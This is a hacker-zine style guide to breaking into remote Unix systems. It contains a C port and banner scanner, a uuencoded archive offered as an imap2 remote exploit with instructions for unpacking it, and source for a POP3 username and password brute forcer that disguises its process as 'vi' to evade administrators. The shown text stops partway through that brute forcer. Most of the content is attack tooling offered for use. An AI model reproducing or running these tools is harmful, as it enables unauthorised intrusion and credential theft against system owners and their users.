How to get in... (remote)
			-------------------------------------
								by Phantom

Well, folks, once you've got the name of the site it's fairly hard (:)) to get
inside, especially if it has a firewall && stuff...
But if you collect enough info on that site, maybe, just maybe, you might get
in..
So you might think of programs you could use to get a root shell, or maybe a
passwd/shadow file... :)
Well, you should definitely look for open ports and the daemons behind them,
like imapd (143), httpd (80), sendmail (25), nntp (119), pop3 (110) && stuff..
Every one of those is a different way in, and the banner it prints when you
connect usually tells you which software and version you're up against.
In this file you won't find any exploits, due to complaints about how we
provide stuff to remotely break into somebody's system. So if you have a
user there it's your responsibility, but if we provide you with such tools
it seems people think it's our responsibility...
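Here's what that first look means in practice: connect to each of those ports, read the greeting line and see what it tells you. The program below is an example added to this file, not Phantom's code: it walks a fixed port list, reads the first line with a timeout (httpd says nothing until you send a request, so you can't block forever on it) and maps the greeting format to a service name. The loopback_banner() helper pushes a constructed greeting through a socketpair so the line reader can be tried without a target.

```c
#define _DEFAULT_SOURCE 1
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netdb.h>

/* Read one line from fd into buf, waiting at most timeout_sec for each byte.
 * Returns the number of bytes stored (0 if the daemon stayed silent) or -1 on
 * error. One byte per read() so nothing past the greeting is consumed. */
int grab_banner(int fd, char *buf, size_t len, int timeout_sec)
{
    size_t n = 0;
    while (n + 1 < len) {
        fd_set rfds;
        struct timeval tv = { timeout_sec, 0 };
        char c;
        FD_ZERO(&rfds);
        FD_SET(fd, &rfds);
        int r = select(fd + 1, &rfds, NULL, NULL, &tv);
        if (r < 0) return -1;
        if (r == 0) break;                      /* timeout: silent service */
        if (read(fd, &c, 1) <= 0) break;        /* peer closed */
        if (c == '\n') break;
        if (c != '\r') buf[n++] = c;
    }
    buf[n] = '\0';
    return (int)n;
}

/* Greeting formats: POP3 "+OK", IMAP "* OK", SMTP and FTP "220", NNTP "200"
 * (posting allowed) or "201" (read-only). The port breaks the 220 tie. */
const char *identify_service(const char *banner, int port)
{
    if (strncmp(banner, "+OK", 3) == 0)  return "pop3";
    if (strncmp(banner, "* OK", 4) == 0) return "imap";
    if (strncmp(banner, "220", 3) == 0)  return port == 21 ? "ftp" : "smtp";
    if (strncmp(banner, "200", 3) == 0 || strncmp(banner, "201", 3) == 0) return "nntp";
    if (banner[0] == '\0') return port == 80 ? "http?" : "silent";
    return "unknown";
}

/* TCP connect to host:port; returns the socket or -1. */
int tcp_connect(const char *host, int port)
{
    struct addrinfo hints, *res, *ai;
    char portstr[8];
    int s = -1;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    snprintf(portstr, sizeof portstr, "%d", port);
    if (getaddrinfo(host, portstr, &hints, &res) != 0) return -1;
    for (ai = res; ai != NULL; ai = ai->ai_next) {
        s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (s < 0) continue;
        if (connect(s, ai->ai_addr, ai->ai_addrlen) == 0) break;
        close(s);
        s = -1;
    }
    freeaddrinfo(res);
    return s;
}

/* Self-check without a target: push a constructed greeting through a
 * socketpair and read it back exactly as a real daemon's would be read. */
const char *loopback_banner(const char *sent, int timeout_sec)
{
    static char got[512];
    int sv[2];
    got[0] = '\0';
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return got;
    if (write(sv[0], sent, strlen(sent)) < 0) { close(sv[0]); close(sv[1]); return got; }
    grab_banner(sv[1], got, sizeof got, timeout_sec);
    close(sv[0]);
    close(sv[1]);
    return got;
}

int main(int argc, char **argv)
{
    static const int ports[] = { 21, 25, 80, 110, 119, 143 };
    if (argc != 2) { fprintf(stderr, "usage: %s host\n", argv[0]); return 1; }
    for (size_t i = 0; i < sizeof ports / sizeof ports[0]; i++) {
        char banner[512];
        int s = tcp_connect(argv[1], ports[i]);
        if (s < 0) { printf("%5d closed\n", ports[i]); continue; }
        grab_banner(s, banner, sizeof banner, 5);
        printf("%5d open   %-8s %s\n", ports[i], identify_service(banner, ports[i]), banner);
        close(s);
    }
    return 0;
}
```

A closed port just fails the connect; an open one with no banner (httpd, or a daemon that waits for you to talk first) comes back empty after the timeout instead of hanging the scan, which is the case a one-line "read the banner" loop usually gets wrong.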


so, DONT READ ANY FURTHER!!!!!!!!!!!!!!!!!!!!!!!!!!! 














:)
But anyway, if you really need some of those programs, here are a couple of
them...
Here is a uuencoded package to exploit imap2 (save everything from the "begin"
line to the "end" line into a file, run uudecode on it and untar the resulting
imap.tgz):

begin 644 imap.tgz
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
5AC:TH0UM:$/[O[:_`&NPZ$L`H```
`
end

Now, here's a POP3 brute forcer (it walks a username list and a dictionary
through USER/PASS, which works for the reasons the comment on top of it gives):

/* : After recently installing POP3d on a machine, I played around with it a 
: bit and came to a few conclusions:
: 	1) It allows for multiple username/password guesses
: 	2) There is no logging option for bad user/pass guesses.

: This seems like something just begging to be brute force hacked.
: Any comments?        */

#include <stdio.h>
#include <stdlib.h>     /* exit, malloc, free */
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h> 

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT               110

/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS                  "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT		0



/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
void hackity_hack(void);

int popfd;
FILE *popfp;

FILE *userfile;
FILE *dictfile;

char host[255];
char dict[255];
char user[255];

int main(int argc, char **argv)
{
   if(argc < 4)
   {
      /* invalid syntax, display syntax and exit */   
      printf("Syntax: %s host userfile dictfile\n", argv[0]);
      exit(0);
   }   
   
   /* Validate that the host exists */
   if(pop_connect(argv[1]) == -1)
   {
      /* Error */
      printf("Error connecting to host %s\n", argv[1]);
      exit(0);
   }
   printf("Connected to: %s\n\n", argv[1]);
   
   /* Check for the existance of the user file */
   userfile=fopen(argv[2], "rt");
   if(userfile==NULL)
   {
      /* Error */
      printf("Error opening userfile %s\n", argv[2]);
      exit(0);
   }
   fclose(userfile);
   
   /* Checking for the existance of dict file */
   dictfile=fopen(argv[3], "rt");
   if(dictfile==NULL)
   {
      /* Error */
      printf("Error opening dictfile %s\n", argv[3]);
      exit(0);
   }
   fclose(dictfile);
   
   /* Copy important arguments to variables */
   strcpy(host, argv[1]);
   strcpy(user, argv[2]);
   strcpy(dict, argv[3]);
               
   nuke_string(argv[0]);
   nuke_string(argv[1]);
   nuke_string(argv[2]);
   nuke_string(argv[3]);   
 strcpy(argv[0], MASKAS);

   swallow_welcome();   
   hackity_hack();
   return 0;
}

      
void nuke_string(char *targetstring)
{
   char *mystring=targetstring;
   
   while(*targetstring != '\0')
   {
      *targetstring=' ';
      targetstring++;
   }
   *mystring='\0';
}


int pop_connect(char *pophost)
{
   int popsocket;
   struct sockaddr_in sin;
   struct hostent *hp;
      
   hp=gethostbyname(pophost);
   if(hp==NULL) return -1;
   
   bzero((char *)&sin,sizeof(sin));
   bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
   sin.sin_family=hp->h_addrtype;
   sin.sin_port=htons(POP3_PORT);
   popsocket=socket(AF_INET, SOCK_STREAM, 0);
   if(popsocket==-1) return -1;
   if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1;
   popfd=popsocket;
   return popsocket;   
}
int pop_guess(char *username, char *password)
{
   char buff[512];
   
   /* RFC 1939 commands end in CRLF (most servers also take a bare LF) */
   snprintf(buff, sizeof(buff), "USER %s\r\n", username);
   send(popfd, buff, strlen(buff), 0);   
   getanswer(buff);
      
   snprintf(buff, sizeof(buff), "PASS %s\r\n", password);
   send(popfd, buff, strlen(buff), 0);
   getanswer(buff);
   if(strstr(buff, "+OK") != NULL)
   {
      printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
      return 0;
   }
   else return -1;
}

/* Keep reading lines until one carries a status (+OK / -ERR) */
char *getanswer(char *buff)
{
   for(;;)
   {
      if(getanswer_(buff) == NULL)
      {
         /* server hung up (or dropped us for guessing too much) */
         printf("Connection closed by %s\n", host);
         exit(1);
      }
      if(strstr(buff, "+OK") != NULL) return buff;
      if(strstr(buff, "-ERR") != NULL) return buff;
   }
}

/* Read one line: CR is dropped, LF ends it. Returns NULL on EOF.
   Callers pass 512-byte buffers, so never store more than 511 chars. */
char *getanswer_(char *buff)
{
   int ch;
   char *in=buff;
   
   for(;;)
   {
      ch=getc(popfp);
